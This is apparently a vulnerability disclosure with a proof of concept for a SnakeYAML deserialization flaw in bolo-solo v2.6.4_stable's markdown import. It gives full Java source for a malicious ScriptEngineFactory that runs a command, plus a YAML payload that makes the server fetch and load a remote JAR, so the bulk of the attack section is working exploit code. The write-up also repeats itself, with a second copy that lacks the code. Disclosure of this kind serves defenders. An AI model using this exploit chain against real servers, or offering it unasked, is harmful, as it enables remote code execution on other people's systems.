In the bolo-solo v2.6.4_stable version, there is a deserialization vulnerability in the "import/markdown" path. This vulnerability stems from an insecure YAML loading issue.
Vulnerability file: src/main/java/org/b3log/solo/bolo/prop/BackupService.java
Follow up on the importMarkdownsSync() method. This method reads all the.md files within the compressed package and obtains the article object through the parseArticle() method.
Follow up on the parseArticle() method. This method loads the content of the read file using YAML. However, the secure loading method was not adopted here, resulting in the SnakeYAML deserialization vulnerability.
After execution, the calculator successfully popped up.
POC:
Step 1: Jar file creation, with the function of launching the local calculator
package artsploit;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
public AwesomeScriptEngineFactory() {
try {
Runtime.getRuntime().exec("calc.exe");
} catch (IOException e) {
e.printStackTrace();
}
}
@Override
public String getEngineName() {
return null;
}
@Override
public String getEngineVersion() {
return null;
}
@Override
public List<String> getExtensions() {
return null;
}
@Override
public List<String> getMimeTypes() {
return null;
}
@Override
public List<String> getNames() {
return null;
}
@Override
public String getLanguageName() {
return null;
}
@Override
public String getLanguageVersion() {
return null;
}
@Override
public Object getParameter(String key) {
return null;
}
@Override
public String getMethodCallSyntax(String obj, String m, String... args) {
return null;
}
@Override
public String getOutputStatement(String toDisplay) {
return null;
}
@Override
public String getProgram(String... statements) {
return null;
}
@Override
public ScriptEngine getScriptEngine() {
return null;
}
}
Step 2: Place the malicious JAR file on the web server. Here, we use Python to start the web server.
Step 3: Package the malicious md document and upload it to the server.
MD document POC:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://127.0.0.1:8000/yaml-payload.jar"]
]]
]Click to upload
Triggering a vulnerability.
In the bolo-solo v2.6.4_stable version, there is a deserialization vulnerability in the "import/markdown" path. This vulnerability stems from an insecure YAML loading issue.
Vulnerability file: src/main/java/org/b3log/solo/bolo/prop/BackupService.java
Follow up on the importMarkdownsSync() method. This method reads all the.md files within the compressed package and obtains the article object through the parseArticle() method.
Follow up on the parseArticle() method. This method loads the content of the read file using YAML. However, the secure loading method was not adopted here, resulting in the SnakeYAML deserialization vulnerability.
After execution, the calculator successfully popped up.
POC:
Step 1: Jar file creation, with the function of launching the local calculator
Step 2: Place the malicious JAR file on the web server. Here, we use Python to start the web server.
Step 3: Package the malicious md document and upload it to the server.
MD document POC:
Click to upload
Triggering a vulnerability.